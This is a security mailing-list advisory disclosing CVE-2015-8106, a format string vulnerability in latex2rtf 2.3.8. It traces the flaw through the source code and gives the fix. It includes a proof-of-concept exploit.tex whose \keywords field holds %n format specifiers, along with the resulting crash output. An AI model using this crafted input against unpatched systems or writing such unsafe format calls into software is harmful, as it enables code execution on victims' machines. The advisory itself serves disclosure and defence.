Date: Mon, 16 Nov 2015 19:18:10 +0900
From: 김종권 <jgkim@...as.snu.ac.kr>
To: oss-security@...ts.openwall.com
Cc: wslee@...as.snu.ac.kr
Subject: CVE-2015-8106 - latex2rtf v2.3.8 format string vulnerability

Dear List,

I am writing this to report a format string vulnerability in ubuntu
package latex2rtf. (2.3.8, which is the latest version).
Also I already have been assigned a CVE identifier from MITRE
"CVE-2015-8106", so I want to make public this vulnerability.

- Target Platform
    Windows, Linux, OS X
- Target Version
    2.3.8 (Latest Version)

- Vulnerability description
When the user runs latex2rtf with malicious crafted tex file, an
attacker can execute arbitrary code.
The function CmdKeywords processes the \keywords command in tex file.
The variable `keywords' in the function CmdKeywords may hold a malicious
input string, which can be used as a format argument of vsnprintf.

-- Step 1. (funct1.c 1789 line)

1789        char *keywords = getBraceParam();

For instance, the variable keywords will point to the string “MALICIOUS”
when a text line "\keywords{MALICIOUS}” exists in an input tex file.

-- Step 2. (funct1.c 1798 line)

1798    fprintRTF(keywords);

fprintfRTF() is called in line 1798, and the parameter is used as a
format string, which can be malicious, as we described in step 1.

-- Step 3. (main.c 873 line)
858    void fprintRTF(char *format, ...){
873    vsnprintf(buffer, 1024, format, apf);

The value of format, which may be malicious, is used as an argument of
vsnprintf in line 873, therefore arbitrary code can be executed.

-- Step 4. Our malicious input
"exploit.tex"
========================
\documentclass{article}
\begin{document}
\title{Exploitable}
\author{Jong-Gwon Kim}
\keywords{%x\%n\%n\%n}
\end{document}
=========================
Execute
==========================
~ $ latex2rtf -v
latex2rtf 2.3.8 r1240 (released June 16 2014)

Written by Prahl, Lehner, Granzer, Dorner, Polzer, Trisko, Schlatterbeck.
~ $ latex2rtf exploit.tex
aborted (core dumped)
==========================

-- Step 5. How to fix
(funct1.c 1798 line)

1798    fprintRTF(keywords);  ===>  fprintRTF("%s", keywords);

- How we found the vulnerability

We used a static analyzer, Sparrow[1], to find the format string bug.
Our analyzer reported an alarm in latex2rtf main.c 873 line, So we
looked for a latex2rtf source code and found the bug.

Sparrow is a state-of-the-art static analyzer that aims to verify the
absence of fatal bugs in C source. Sparrow is designed by Abstract
Interpretation and the analysis is sound in design. Sparrow adopts a
number of well-founded static analysis techniques[2,3] for scalability,
precision, and user convenience.